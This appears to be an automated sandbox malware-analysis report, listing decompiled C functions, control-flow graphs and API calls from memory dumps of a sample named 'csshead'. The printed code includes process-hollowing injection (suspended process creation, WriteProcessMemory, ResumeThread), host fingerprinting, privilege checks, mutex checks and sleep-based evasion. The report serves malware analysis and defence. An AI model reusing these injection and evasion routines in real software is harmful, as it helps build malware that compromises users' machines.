    Memory Dump Source
    • Source File: 00000000.00000002.27490385970.00403000.00000020.sdmp, Offset: 00400000, based on PE: true
    • Associated: 00000000.00000002.27490362512.00400000.00000002.sdmp
    • Associated: 00000000.00000002.27490373963.00401000.00000040.sdmp
    • Associated: 00000000.00000002.27490402428.0040A000.00000004.sdmp
    • Associated: 00000000.00000002.27490416512.0040E000.00000002.sdmp
    Joe Sandbox IDA Plugin
    • Snapshot File: hcaresult_0_2_400000_csshead.jbxd
    Function 00424890, Relevance: 10.6, APIs: 5, Strings: 1, Instructions: 74

    Control-flow Graph

    • Executed
    • Not Executed
    control_flow_graph 1619 424890-4248b8 RtlDecodePointer * 2 1620 42493f 1619->1620 1621 4248be-4248c8 1619->1621 1622 424941-424945 1620->1622 1621->1620 1623 4248ca-4248d8 call 4252ae 1621->1623 1626 424922-42493d RtlEncodePointer * 2 1623->1626 1627 4248da-4248e1 1623->1627 1626->1622 1628 4248e5-4248e9 1627->1628 1629 4248e3 1627->1629 1630 4248eb-4248f8 call 42a170 1628->1630 1631 4248fa-4248ff 1628->1631 1629->1628 1630->1631 1637 424910-42491d RtlEncodePointer 1630->1637 1631->1620 1633 424901-42490e call 42a170 1631->1633 1633->1620 1633->1637 1637->1626
    APIs
    • RtlDecodePointer.NTDLL(00442BF0), ref: 004248A5
    • RtlDecodePointer.NTDLL ref: 004248B2
      • Part of subcall function 004252AE: RtlSizeHeap.NTDLL(00000000,00000000), ref: 004252D9
      • Part of subcall function 0042A170: Sleep.KERNEL32(00000000,00000000,00000000,?,0042490A,00000000,00000010,?,?,00424994,00000000,0043CD58,0000000C,004249C0,00000000), ref: 0042A19A
    • RtlEncodePointer.NTDLL(00000000), ref: 00424917
    • RtlEncodePointer.NTDLL(00000000), ref: 0042492B
    • RtlEncodePointer.NTDLL(-00000004), ref: 00424933
    Strings
    Memory Dump Source
    • Source File: 00000000.00000002.27490429877.00410000.00000040.sdmp, Offset: 00410000, based on PE: false
    Joe Sandbox IDA Plugin
    • Snapshot File: hcaresult_0_2_410000_csshead.jbxd
    Function 004047AC, Relevance: 10.6, APIs: 5, Strings: 1, Instructions: 64file

    Control-flow Graph

    • Executed
    • Not Executed
    control_flow_graph 1638 4047ac-4047e6 1640 4047e8-4047fa 1638->1640 1641 404804-404808 1638->1641 1645 404801 1640->1645 1642 40480a-40481d GetFileSize 1641->1642 1643 404855-40485b 1641->1643 1642->1643 1644 40481f-404852 call 4013b4 ReadFile CloseHandle 1642->1644 1644->1643 1645->1641
    C-Code - Quality: 100%
    			E004047AC(CHAR* __eax, void** __edx) {
				CHAR* _v8;
				void** _v12;
				long _v16;
				void* _v20;
				long _v24;
				long _v28;
				void* _t27;
				void* _t43;

				_v12 = __edx;
				_v8 = __eax;
				_v16 = 0xffffffff;
				 *_v12 = 0;
				_t27 = CreateFileA(_v8, 0x80000000, 1, 0, 3, 0, 0); // executed
				_v20 = _t27;
				if(_v20 == 0xffffffff) {
					_t43 = CreateFileA(_v8, 0x80000000, 0, 0, 3, 0, 0); // executed
					_v20 = _t43;
				}
				if(_v20 != 0xffffffff) {
					_v24 = GetFileSize(_v20, 0);
					if(_v24 != 0) {
						E004013B4(_v12, _v24 + 1);
						ReadFile(_v20,  *_v12, _v24,  &_v28, 0);
						CloseHandle(_v20);
						_v16 = _v24;
					}
				}
				return _v16;
			}











    0x004047b2
    0x004047b5
    0x004047b8
    0x004047c4
    0x004047d9
    0x004047df
    0x004047e6
    0x004047fb
    0x00404801
    0x00404801
    0x00404808
    0x00404816
    0x0040481d
    0x00404826
    0x0040483f
    0x00404849
    0x00404852
    0x00404852
    0x0040481d
    0x0040485b

    APIs
    • CreateFileA.KERNELBASE(?,80000000,00000001,00000000,00000003,00000000,00000000), ref: 004047D9
    • CreateFileA.KERNELBASE(?,80000000,00000000,00000000,00000003,00000000,00000000), ref: 004047FB
    • GetFileSize.KERNEL32(?,00000000), ref: 00404810
      • Part of subcall function 004013B4: VirtualAlloc.KERNELBASE(00000000,?,00003000,00000004), ref: 004013CD
    • ReadFile.KERNEL32(?,?,?,?,00000000), ref: 0040483F
    • CloseHandle.KERNEL32(?), ref: 00404849
    Strings
    Memory Dump Source
    • Source File: 00000000.00000002.27490385970.00403000.00000020.sdmp, Offset: 00400000, based on PE: true
    • Associated: 00000000.00000002.27490362512.00400000.00000002.sdmp
    • Associated: 00000000.00000002.27490373963.00401000.00000040.sdmp
    • Associated: 00000000.00000002.27490402428.0040A000.00000004.sdmp
    • Associated: 00000000.00000002.27490416512.0040E000.00000002.sdmp
    Joe Sandbox IDA Plugin
    • Snapshot File: hcaresult_0_2_400000_csshead.jbxd
    Function 0042D0C2, Relevance: 10.6, APIs: 5, Strings: 1, Instructions: 54timethread

    Control-flow Graph

    • Executed
    • Not Executed
    control_flow_graph 1648 42d0c2-42d0e5 1649 42d0f4-42d131 GetSystemTimeAsFileTime GetCurrentProcessId GetCurrentThreadId GetTickCount RtlQueryPerformanceCounter 1648->1649 1650 42d0e7-42d0e9 1648->1650 1651 42d133-42d138 1649->1651 1652 42d13a-42d13c 1649->1652 1650->1649 1653 42d0eb-42d0f2 1650->1653 1655 42d14a-42d158 1651->1655 1654 42d13e-42d148 1652->1654 1652->1655 1656 42d159-42d15c 1653->1656 1654->1655 1655->1656
    APIs
    • GetSystemTimeAsFileTime.KERNEL32(00000000), ref: 0042D0F9
    • GetCurrentProcessId.KERNEL32 ref: 0042D105
    • GetCurrentThreadId.KERNEL32 ref: 0042D10D
    • GetTickCount.KERNEL32 ref: 0042D115
    • RtlQueryPerformanceCounter.NTDLL(?), ref: 0042D121
    Strings
    Memory Dump Source
    • Source File: 00000000.00000002.27490429877.00410000.00000040.sdmp, Offset: 00410000, based on PE: false
    Joe Sandbox IDA Plugin
    • Snapshot File: hcaresult_0_2_410000_csshead.jbxd
    Function 00409347, Relevance: 9.1, APIs: 6, Instructions: 82
    C-Code - Quality: 75%
    			E00409347() {
				void* _t16;
				intOrPtr _t24;
				intOrPtr _t29;
				intOrPtr _t32;
				intOrPtr _t42;
				intOrPtr* _t47;
				intOrPtr* _t49;
				void* _t51;

				_t16 =  *_t49(); // executed
				if(_t16 != 0) {
					 *_t47(0);
				}
				if(E0040453C(GetCurrentProcess()) == 0) {
					GetWindowsDirectoryA(_t51 - 0x218, 0x101);
					E0040133C(_t51 - 0x218, 0x40946c);
				} else {
					GetWindowsDirectoryA(_t51 - 0x218, 0x101);
					_t42 =  *0x40a0b0; // 0x401c64
					E0040133C(_t51 - 0x218, _t42);
				}
				_t24 =  *0x40a08c; // 0x401c00
				E0040133C(_t51 - 0x218, _t24);
				_t29 = E00405028(_t51 - 0x218, 0, E00409080, _t51 - 0x117, 0xffffffff, 0xfa0); // executed
				 *((intOrPtr*)(_t51 - 0xc)) = _t29;
				if( *((intOrPtr*)(_t51 - 0xc)) == 0xffffffff) {
					 *0x40b21c(0, _t51 - 0x218, 0x26, 0xffffffff);
					_t32 =  *0x40a0dc; // 0x401ce8
					E0040133C(_t51 - 0x218, _t32);
					if(PathFileExistsA(_t51 - 0x218) != 0) {
						 *((intOrPtr*)(_t51 - 0xc)) = E00405028(_t51 - 0x218, 0, E00409080, _t51 - 0x117, 0xffffffff, 0xfa0);
					}
				}
				ExitProcess(0);
			}











    0x00409347
    0x0040934c
    0x00409350
    0x00409352
    0x00409366
    0x0040939d
    0x004093af
    0x00409368
    0x00409374
    0x0040937a
    0x00409387
    0x0040938c
    0x004093b7
    0x004093c4
    0x004093e8
    0x004093f0
    0x004093f7
    0x00409406
    0x0040940c
    0x00409419
    0x00409430
    0x00409456
    0x00409456
    0x00409430
    0x0040945b

    APIs
    • GetCurrentProcess.KERNEL32 ref: 00409359
      • Part of subcall function 0040453C: GetCurrentProcess.KERNEL32 ref: 00404555
      • Part of subcall function 0040453C: IsWow64Process.KERNEL32(00000000,?), ref: 0040456F
    • GetWindowsDirectoryA.KERNEL32(?,00000101), ref: 00409374
    • GetWindowsDirectoryA.KERNEL32(?,00000101), ref: 0040939D
      • Part of subcall function 00405028: GetModuleHandleA.KERNEL32(00000000), ref: 00405040
      • Part of subcall function 00405028: CreateProcessA.KERNELBASE(00000000,?,00000000,00000000,00000000,00000004,00000000,00000000,00000044,?), ref: 0040508F
      • Part of subcall function 00405028: CreateFileMappingA.KERNEL32(000000FF,00000000,00000004,00000000,?,?), ref: 004050F5
      • Part of subcall function 00405028: MapViewOfFile.KERNELBASE(?,000F001F,00000000,00000000,00000000), ref: 0040510D
      • Part of subcall function 00405028: GetThreadContext.KERNEL32(?,00010007), ref: 00405209
      • Part of subcall function 00405028: VirtualProtectEx.KERNELBASE(?,00000000,0000029B,00000040,?), ref: 00405252
      • Part of subcall function 00405028: WriteProcessMemory.KERNELBASE(?,00000000,?,0000029B,?), ref: 0040526C
      • Part of subcall function 00405028: ResumeThread.KERNELBASE(?), ref: 0040527E
      • Part of subcall function 00405028: WaitForSingleObject.KERNEL32(?,00000000), ref: 00405292
      • Part of subcall function 00405028: GetExitCodeProcess.KERNEL32(?,?), ref: 004052A4
      • Part of subcall function 00405028: CloseHandle.KERNEL32(?), ref: 004052BE
      • Part of subcall function 00405028: CloseHandle.KERNEL32(?), ref: 004052C8
    • SHGetSpecialFolderPathA.SHELL32(00000000,?,00000026,000000FF), ref: 00409406
    • PathFileExistsA.SHLWAPI(?), ref: 00409428
    • ExitProcess.KERNEL32 ref: 0040945B
    Memory Dump Source
    • Source File: 00000000.00000002.27490385970.00403000.00000020.sdmp, Offset: 00400000, based on PE: true
    • Associated: 00000000.00000002.27490362512.00400000.00000002.sdmp
    • Associated: 00000000.00000002.27490373963.00401000.00000040.sdmp
    • Associated: 00000000.00000002.27490402428.0040A000.00000004.sdmp
    • Associated: 00000000.00000002.27490416512.0040E000.00000002.sdmp
    Joe Sandbox IDA Plugin
    • Snapshot File: hcaresult_0_2_400000_csshead.jbxd
    Function 00404A68, Relevance: 8.8, APIs: 4, Strings: 1, Instructions: 88registry
    C-Code - Quality: 93%
    			E00404A68(intOrPtr __eax) {
				intOrPtr _v8;
				signed int _v12;
				long _v16;
				signed int _v20;
				void* _v24;
				char _v153;
				int _t30;
				char* _t32;
				intOrPtr _t37;
				void* _t48;
				intOrPtr _t49;
				void* _t51;
				signed int _t52;
				signed char _t62;
				intOrPtr _t67;

				_v8 = __eax;
				_v12 = 0;
				_v16 = 0x81;
				_t30 = GetComputerNameA( &_v153,  &_v16);
				_t72 = _t30;
				if(_t30 != 0) {
					_v12 = E00401740( &_v153);
				}
				_t32 =  *0x40a25c; // 0x402174
				RegOpenKeyExA(0x80000002, _t32, 0, 0x20119,  &_v24); // executed
				_v16 = 4;
				_v20 = 0;
				_t37 =  *0x40a0f0; // 0x401d3c
				E004038B0(_v24, _t37, 0, 0,  &_v20,  &_v16); // executed
				E00403890(_v24);
				_v12 = _v12 ^ _v20 ^ 0x4c8aa297;
				E00401164(_v12,  &_v153);
				 *0x40a064 = E004044F0(_t72);
				_t48 = GetCurrentProcess(); // executed
				_t49 = E004042D4(_t48); // executed
				 *0x40a068 = _t49;
				if(E004044F0(_t72) >= 0x3c) {
					_t51 = GetCurrentProcess(); // executed
					_t52 = E004042D4(_t51); // executed
					__eflags = _t52 - 3;
					_t21 = _t52 == 3;
					__eflags = _t21;
					asm("sbb eax, eax");
					 *0x40a034 =  ~(_t52 & 0xffffff00 | _t21);
				} else {
					_t62 = E004041CC();
					asm("sbb eax, eax");
					 *0x40a034 =  ~_t62;
				}
				if( *0x40a034 != 0) {
					_t67 =  *0x40a09c; // 0x401c30
					E00401308(_v8, _t67);
				}
				E0040133C(_v8, 0x404b9c);
				return E0040133C(_v8,  &_v153);
			}


















    0x00404a71
    0x00404a76
    0x00404a79
    0x00404a8b
    0x00404a91
    0x00404a93
    0x00404aa0
    0x00404aa0
    0x00404aae
    0x00404ab9
    0x00404abf
    0x00404ac8
    0x00404ad7
    0x00404ae1
    0x00404aec
    0x00404afc
    0x00404b08
    0x00404b12
    0x00404b17
    0x00404b1d
    0x00404b22
    0x00404b2f
    0x00404b41
    0x00404b47
    0x00404b4c
    0x00404b4f
    0x00404b4f
    0x00404b54
    0x00404b56
    0x00404b31
    0x00404b31
    0x00404b38
    0x00404b3a
    0x00404b3a
    0x00404b62
    0x00404b64
    0x00404b6d
    0x00404b6d
    0x00404b7b
    0x00404b99

    APIs
    • GetComputerNameA.KERNEL32(?,00000081), ref: 00404A8B
    • RegOpenKeyExA.KERNELBASE(80000002,00402174,00000000,00020119,?), ref: 00404AB9
      • Part of subcall function 004038B0: RegQueryValueExA.KERNELBASE(?,?,?,?,?,?,?,?,00406992,?,00401D3C,00000000,00000000,?,?), ref: 004038CC
      • Part of subcall function 00403890: RegCloseKey.ADVAPI32(?), ref: 0040389D
      • Part of subcall function 004044F0: GetVersionExA.KERNEL32(0000009C), ref: 0040451A
    • GetCurrentProcess.KERNEL32 ref: 00404B17
      • Part of subcall function 004042D4: OpenProcessToken.ADVAPI32(?,00000008,?), ref: 004042EC
      • Part of subcall function 004042D4: GetTokenInformation.KERNELBASE(?,00000019(TokenIntegrityLevel),00000000,00000000,?), ref: 0040430E
      • Part of subcall function 004042D4: GetLastError.KERNEL32 ref: 00404322
      • Part of subcall function 004042D4: GetTokenInformation.KERNELBASE(?,00000019(TokenIntegrityLevel),00000000,?,?), ref: 00404358
      • Part of subcall function 004042D4: GetSidSubAuthorityCount.ADVAPI32(?), ref: 0040436E
      • Part of subcall function 004042D4: GetSidSubAuthority.ADVAPI32(?,?), ref: 00404393
      • Part of subcall function 004042D4: CloseHandle.KERNEL32(?), ref: 004043F3
    • GetCurrentProcess.KERNEL32 ref: 00404B41
      • Part of subcall function 004041CC: GetCurrentThread.KERNEL32 ref: 004041DE
      • Part of subcall function 004041CC: OpenThreadToken.ADVAPI32(00000000), ref: 004041E5
      • Part of subcall function 004041CC: GetLastError.KERNEL32 ref: 004041F4
      • Part of subcall function 004041CC: GetCurrentProcess.KERNEL32 ref: 00404207
      • Part of subcall function 004041CC: OpenProcessToken.ADVAPI32(00000000), ref: 0040420E
      • Part of subcall function 004041CC: GetTokenInformation.ADVAPI32(?,00000002,?,00000400,?), ref: 00404241
      • Part of subcall function 004041CC: CloseHandle.KERNEL32(?), ref: 0040424E
      • Part of subcall function 004041CC: AllocateAndInitializeSid.ADVAPI32(0040A2A4,00000002,00000020,00000220,00000000,00000000,00000000,00000000,00000000,00000000,?), ref: 00404278
      • Part of subcall function 004041CC: EqualSid.ADVAPI32(?,?), ref: 004042A2
      • Part of subcall function 004041CC: FreeSid.ADVAPI32(?), ref: 004042BE
    Strings
    Memory Dump Source
    • Source File: 00000000.00000002.27490385970.00403000.00000020.sdmp, Offset: 00400000, based on PE: true
    • Associated: 00000000.00000002.27490362512.00400000.00000002.sdmp
    • Associated: 00000000.00000002.27490373963.00401000.00000040.sdmp
    • Associated: 00000000.00000002.27490402428.0040A000.00000004.sdmp
    • Associated: 00000000.00000002.27490416512.0040E000.00000002.sdmp
    Joe Sandbox IDA Plugin
    • Snapshot File: hcaresult_0_2_400000_csshead.jbxd
    Function 00409230, Relevance: 8.8, APIs: 4, Strings: 1, Instructions: 48sleep
    C-Code - Quality: 79%
    			E00409230(intOrPtr* __ebx, intOrPtr* __ecx) {
				void* _t8;
				void* _t11;
				int _t12;
				void* _t13;
				CHAR* _t14;
				void* _t22;
				intOrPtr _t24;
				void* _t25;

				_t8 =  *__ecx(); // executed
				if(_t8 != 0) {
					_push(0);
					 *__ebx();
				}
				_pop(_t22);
				_pop(_t19);
				_t24 =  *0x40a0a8; // 0x401c4c
				_t11 = E00401110( *((intOrPtr*)(_t25 - 4)), _t24);
				_t29 = _t11;
				if(_t11 == 0) {
					 *((char*)(_t25 - 0x116)) = 0x2d;
				} else {
					 *((char*)(_t25 - 0x116)) = 0x2b;
					Sleep(0x3a98);
				}
				_t12 = E00406E04(_t22, _t29);
				if(_t12 == 0) {
					if( *((char*)(_t25 - 0x116)) != 0x2d) {
						L9:
						_push(_t12);
						_push(_t22); // executed
						_t13 = E004069BC(_t24, _t32); // executed
						_t12 = _t13 + E004092CD;
						goto __eax; // executed
					}
					_t14 =  *0x40a0d8; // 0x401cc8
					_t12 = OpenMutexA(0x100000, 0, _t14);
					 *(_t25 - 8) = _t12;
					_t32 =  *(_t25 - 8);
					if( *(_t25 - 8) == 0) {
						goto L9;
					}
					_t12 = CloseHandle( *(_t25 - 8));
					ExitProcess(0);
				}
				return _t12;
			}











    0x00409230
    0x00409235
    0x00409237
    0x00409239
    0x0040923b
    0x0040923f
    0x00409240
    0x00409242
    0x0040924b
    0x00409250
    0x00409252
    0x00409268
    0x00409254
    0x00409254
    0x00409260
    0x00409260
    0x0040926f
    0x00409276
    0x00409283
    0x004092b3
    0x004092b3
    0x004092b5
    0x004092b6
    0x004092bb
    0x004092cb
    0x004092cb
    0x00409285
    0x00409292
    0x00409298
    0x0040929b
    0x0040929f
    0x00000000
    0x00000000
    0x004092a5
    0x004092ad
    0x004092ad
    0x00409464

    APIs
    • Sleep.KERNEL32(00003A98), ref: 00409260
      • Part of subcall function 00406E04: GetModuleFileNameA.KERNEL32(00000000,?,000001F5), ref: 00406E26
      • Part of subcall function 00406E04: CharUpperBuffA.USER32(?,000001F5), ref: 00406E37
    • OpenMutexA.KERNEL32(00100000,00000000,00401CC8), ref: 00409292
    • CloseHandle.KERNEL32(00000000), ref: 004092A5
    • ExitProcess.KERNEL32 ref: 004092AD
      • Part of subcall function 004069BC: GetTempPathA.KERNEL32(00000101,?), ref: 004069E1
    Strings
    Memory Dump Source
    • Source File: 00000000.00000002.27490385970.00403000.00000020.sdmp, Offset: 00400000, based on PE: true
    • Associated: 00000000.00000002.27490362512.00400000.00000002.sdmp
    • Associated: 00000000.00000002.27490373963.00401000.00000040.sdmp
    • Associated: 00000000.00000002.27490402428.0040A000.00000004.sdmp
    • Associated: 00000000.00000002.27490416512.0040E000.00000002.sdmp
    Joe Sandbox IDA Plugin
    • Snapshot File: hcaresult_0_2_400000_csshead.jbxd
    Function 00455020, Relevance: 7.7, APIs: 5, Instructions: 184library
    APIs
    • LoadLibraryA.KERNEL32(?), ref: 0045515A
    • GetProcAddress.KERNEL32(?,00452FF9), ref: 00455178
    • ExitProcess.KERNEL32(?,00452FF9), ref: 00455189
    • VirtualProtect.KERNELBASE(00400000,00001000,00000004,?,?), ref: 004551A6
    • VirtualProtect.KERNELBASE(00400000,00001000), ref: 004551BB
    Memory Dump Source
    • Source File: 00000000.00000001.27391107672.0042E000.00000080.sdmp, Offset: 00400000, based on PE: true
    • Associated: 00000000.00000001.27391103501.00400000.00000002.sdmp
    • Associated: 00000000.00000001.27391130383.00456000.00000008.sdmp
    Joe Sandbox IDA Plugin
    • Snapshot File: hcaresult_0_1_400000_csshead.jbxd
    Function 0042CDE6, Relevance: 7.6, APIs: 5, Instructions: 72
    APIs
    • GetEnvironmentStringsW.KERNEL32 ref: 0042CDF0
    • WideCharToMultiByte.KERNEL32(00000000,00000000,00000000,00000001,00000000,00000000,00000000,00000000), ref: 0042CE2E
    • FreeEnvironmentStringsW.KERNEL32(00000000), ref: 0042CE70
      • Part of subcall function 0042A0DF: Sleep.KERNEL32(00000000,00000001,?,?,0042C016,00000018,0043D008,0000000C,0042C0A6,?,?,?,00425E08,0000000D), ref: 0042A100
    • WideCharToMultiByte.KERNEL32(00000000,00000000,00000000,?,00000000,?,00000000,00000000), ref: 0042CE51
    • FreeEnvironmentStringsW.KERNEL32(00000000), ref: 0042CE64
      • Part of subcall function 00422804: RtlFreeHeap.NTDLL(00000000,00000000,?,00425EDC,00000000,?,?,00417F96,00000009), ref: 0042281A
      • Part of subcall function 00422804: GetLastError.KERNEL32(00000000,?,00425EDC,00000000,?,?,00417F96,00000009), ref: 0042282C
    Memory Dump Source
    • Source File: 00000000.00000002.27490429877.00410000.00000040.sdmp, Offset: 00410000, based on PE: false
    Joe Sandbox IDA Plugin
    • Snapshot File: hcaresult_0_2_410000_csshead.jbxd
    Function 004092CD, Relevance: 7.0, APIs: 3, Strings: 1, Instructions: 35
    C-Code - Quality: 37%
    			E004092CD() {
				void* _t3;
				intOrPtr _t10;
				intOrPtr _t11;
				intOrPtr* _t18;
				intOrPtr* _t21;
				void* _t24;
				void* _t25;

				_t3 =  *_t21();
				_t28 = _t3;
				if(_t3 != 0) {
					 *_t18(0);
				}
				_pop(_t22);
				_pop(_t19);
				GetModuleFileNameA(0, _t25 - 0x117 + 2, 0x103);
				_t10 = E00407C50(_t25 - 0x117 + 2); // executed
				 *0x40a06c = _t10;
				_t11 =  *0x40a06c; // 0x5b392e46
				wsprintfA("1530474054", E00409468, _t11);
				_push(GetCursorPos(0x40a578));
				E004069BC(_t24, _t28); // executed
				goto __eax;
			}










    0x004092cd
    0x004092cf
    0x004092d2
    0x004092d6
    0x004092d8
    0x004092dc
    0x004092dd
    0x004092f0
    0x004092ff
    0x00409304
    0x00409309
    0x00409319
    0x0040932d
    0x00409330
    0x00409345

    APIs
    • GetModuleFileNameA.KERNEL32(00000000,?,00000103), ref: 004092F0
      • Part of subcall function 00407C50: CreateFileA.KERNELBASE(?,80000000,00000001,00000000,00000003,00000000,00000000), ref: 00407C71
      • Part of subcall function 00407C50: CreateFileA.KERNEL32(?,80000000,00000000,00000000,00000003,00000000,00000000), ref: 00407C93
      • Part of subcall function 00407C50: ReadFile.KERNELBASE(000000FF,?,00000040,?,00000000), ref: 00407CB2
      • Part of subcall function 00407C50: SetFilePointer.KERNELBASE(000000FF,?,00000000,00000000), ref: 00407CC7
      • Part of subcall function 00407C50: ReadFile.KERNELBASE(000000FF,?,00000014,?,00000000), ref: 00407CDD
      • Part of subcall function 00407C50: CloseHandle.KERNEL32(000000FF), ref: 00407CE7
    • wsprintfA.USER32 ref: 00409319
    • GetCursorPos.USER32(0040A578), ref: 00409327
      • Part of subcall function 004069BC: GetTempPathA.KERNEL32(00000101,?), ref: 004069E1
    Strings
    Memory Dump Source
    • Source File: 00000000.00000002.27490385970.00403000.00000020.sdmp, Offset: 00400000, based on PE: true
    • Associated: 00000000.00000002.27490362512.00400000.00000002.sdmp
    • Associated: 00000000.00000002.27490373963.00401000.00000040.sdmp
    • Associated: 00000000.00000002.27490402428.0040A000.00000004.sdmp
    • Associated: 00000000.00000002.27490416512.0040E000.00000002.sdmp
    Joe Sandbox IDA Plugin
    • Snapshot File: hcaresult_0_2_400000_csshead.jbxd
    Function 00404EF0, Relevance: 6.1, APIs: 4, Instructions: 112
    C-Code - Quality: 83%
    			E00404EF0(void* __eax, void* __eflags) {
				void* _v8;
				void _v12;
				void* _v16;
				void _v20;
				void _v24;
				void* _v28;
				void* _v32;
				long _v36;
				intOrPtr* _v40;
				void* _v52;
				void _v64;
				void* _t54;
				signed int _t63;
				signed int _t72;
				signed int _t88;
				signed int _t96;

				_v8 = __eax;
				_v24 = 0;
				_v12 = 0;
				_v28 = E004013DC(0x1000);
				_t54 = E00404E94(_v8); // executed
				_v32 = _t54;
				if(_v32 != 0) {
					_t63 = ReadProcessMemory(_v8, _v32, _v28, 0x1000,  &_v36); // executed
					asm("sbb eax, eax");
					if( ~( ~_t63) != 0) {
						_t72 = ReadProcessMemory(_v8,  *((intOrPtr*)(_v28 + 0x3c)) + _v32, _v28, 0x1000,  &_v36); // executed
						asm("sbb eax, eax");
						if( ~( ~_t72) != 0) {
							_v24 =  *((intOrPtr*)(_v28 + 0x28)) + _v32;
							_v40 = _v28 + 0xc0;
							if( *_v40 != 0 &&  *((intOrPtr*)(_v40 + 4)) != 0) {
								_t88 = ReadProcessMemory(_v8,  *_v40 + _v32,  &_v64, 0x18,  &_v36);
								asm("sbb eax, eax");
								if( ~( ~_t88) != 0) {
									_v16 = _v52;
									if(_v16 != 0) {
										_t96 = ReadProcessMemory(_v8, _v16, _v28, 0x1000,  &_v36);
										asm("sbb eax, eax");
										if( ~( ~_t96) != 0) {
											_v20 =  *_v28;
											if(_v20 != 0) {
												_v24 = _v20;
											}
										}
									}
								}
							}
						}
					}
				}
				E00401440(_v28);
				_v12 = _v24;
				return _v12;
			}



















    0x00404ef6
    0x00404efb
    0x00404f00
    0x00404f0d
    0x00404f13
    0x00404f18
    0x00404f1f
    0x00404f3a
    0x00404f42
    0x00404f48
    0x00404f69
    0x00404f71
    0x00404f77
    0x00404f86
    0x00404f91
    0x00404f9a
    0x00404fbc
    0x00404fc4
    0x00404fca
    0x00404fcf
    0x00404fd6
    0x00404fed
    0x00404ff5
    0x00404ffb
    0x00405002
    0x00405009
    0x0040500e
    0x0040500e
    0x00405009
    0x00404ffb
    0x00404fd6
    0x00404fca
    0x00404f9a
    0x00404f77
    0x00404f48
    0x00405014
    0x0040501c
    0x00405025

    APIs
      • Part of subcall function 004013DC: GetProcessHeap.KERNEL32(00000000,?), ref: 004013EB
      • Part of subcall function 004013DC: RtlAllocateHeap.NTDLL(00000000), ref: 004013F2
      • Part of subcall function 00404E94: NtQueryInformationProcess.NTDLL(?,00000000,?,00000018,?), ref: 00404EAD
      • Part of subcall function 00404E94: ReadProcessMemory.KERNELBASE(?,?,?,00000004,?), ref: 00404EDD
    • ReadProcessMemory.KERNELBASE(?,00000000,?,00001000,?), ref: 00404F3A
    • ReadProcessMemory.KERNELBASE(?,00000000,?,00001000,?), ref: 00404F69
    • ReadProcessMemory.KERNEL32(00000000,00000000,?,00000018,?), ref: 00404FBC
    • ReadProcessMemory.KERNEL32(00000000,00000000,?,00001000,?), ref: 00404FED
      • Part of subcall function 00401440: GetProcessHeap.KERNEL32(00000000,?), ref: 0040144D
      • Part of subcall function 00401440: HeapFree.KERNEL32(00000000), ref: 00401454
    Memory Dump Source
    • Source File: 00000000.00000002.27490385970.00403000.00000020.sdmp, Offset: 00400000, based on PE: true
    • Associated: 00000000.00000002.27490362512.00400000.00000002.sdmp
    • Associated: 00000000.00000002.27490373963.00401000.00000040.sdmp
    • Associated: 00000000.00000002.27490402428.0040A000.00000004.sdmp
    • Associated: 00000000.00000002.27490416512.0040E000.00000002.sdmp
    Joe Sandbox IDA Plugin
    • Snapshot File: hcaresult_0_2_400000_csshead.jbxd
    Function 00406900, Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 58registry
    C-Code - Quality: 92%
    			E00406900(intOrPtr __eax, void* __edx) {
				intOrPtr _v8;
				long _v12;
				signed int _v16;
				signed int _v20;
				void* _v24;
				intOrPtr _v117;
				char _v153;
				char* _t30;
				intOrPtr _t35;

				asm("das");
				 *((intOrPtr*)(__eax)) =  *((intOrPtr*)(__eax)) + __eax;
				_v117 = _v117 + __edx;
				_v8 = __eax;
				_v16 = 0;
				_v12 = 0x81;
				if(GetComputerNameA( &_v153,  &_v12) != 0) {
					_v16 = E00401BA8(_v16, E004012DC( &_v153),  &_v153);
				}
				_t30 =  *0x40a25c; // 0x402174
				RegOpenKeyExA(0x80000002, _t30, 0, 0x20119,  &_v24); // executed
				_v12 = 4;
				_v20 = 0;
				_t35 =  *0x40a0f0; // 0x401d3c
				E004038B0(_v24, _t35, 0, 0,  &_v20,  &_v12); // executed
				E00403890(_v24);
				_v16 = _v16 ^ _v20 ^ 0xac67baee;
				return E00401164(_v16, _v8);
			}












    0x00406900
    0x00406901
    0x00406903
    0x0040690d
    0x00406912
    0x00406915
    0x0040692f
    0x0040694c
    0x0040694c
    0x0040695a
    0x00406965
    0x0040696b
    0x00406974
    0x00406983
    0x0040698d
    0x00406998
    0x004069a8
    0x004069b9

    APIs
    • GetComputerNameA.KERNEL32(?,?), ref: 00406927
    • RegOpenKeyExA.KERNELBASE(80000002,00402174,00000000,00020119,?), ref: 00406965
      • Part of subcall function 004038B0: RegQueryValueExA.KERNELBASE(?,?,?,?,?,?,?,?,00406992,?,00401D3C,00000000,00000000,?,?), ref: 004038CC
      • Part of subcall function 00403890: RegCloseKey.ADVAPI32(?), ref: 0040389D
    Strings
    Memory Dump Source
    • Source File: 00000000.00000002.27490385970.00403000.00000020.sdmp, Offset: 00400000, based on PE: true
    • Associated: 00000000.00000002.27490362512.00400000.00000002.sdmp
    • Associated: 00000000.00000002.27490373963.00401000.00000040.sdmp
    • Associated: 00000000.00000002.27490402428.0040A000.00000004.sdmp
    • Associated: 00000000.00000002.27490416512.0040E000.00000002.sdmp
    Joe Sandbox IDA Plugin
    • Snapshot File: hcaresult_0_2_400000_csshead.jbxd
    Function 00406904, Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 56registry
    C-Code - Quality: 100%
    			E00406904(intOrPtr __eax) {
				intOrPtr _v8;
				long _v12;
				signed int _v16;
				signed int _v20;
				void* _v24;
				char _v153;
				char* _t28;
				intOrPtr _t33;

				_v8 = __eax;
				_v16 = 0;
				_v12 = 0x81;
				if(GetComputerNameA( &_v153,  &_v12) != 0) {
					_v16 = E00401BA8(_v16, E004012DC( &_v153),  &_v153);
				}
				_t28 =  *0x40a25c; // 0x402174
				RegOpenKeyExA(0x80000002, _t28, 0, 0x20119,  &_v24); // executed
				_v12 = 4;
				_v20 = 0;
				_t33 =  *0x40a0f0; // 0x401d3c
				E004038B0(_v24, _t33, 0, 0,  &_v20,  &_v12); // executed
				E00403890(_v24);
				_v16 = _v16 ^ _v20 ^ 0xac67baee;
				return E00401164(_v16, _v8);
			}











    0x0040690d
    0x00406912
    0x00406915
    0x0040692f
    0x0040694c
    0x0040694c
    0x0040695a
    0x00406965
    0x0040696b
    0x00406974
    0x00406983
    0x0040698d
    0x00406998
    0x004069a8
    0x004069b9

    APIs
    • GetComputerNameA.KERNEL32(?,?), ref: 00406927
    • RegOpenKeyExA.KERNELBASE(80000002,00402174,00000000,00020119,?), ref: 00406965
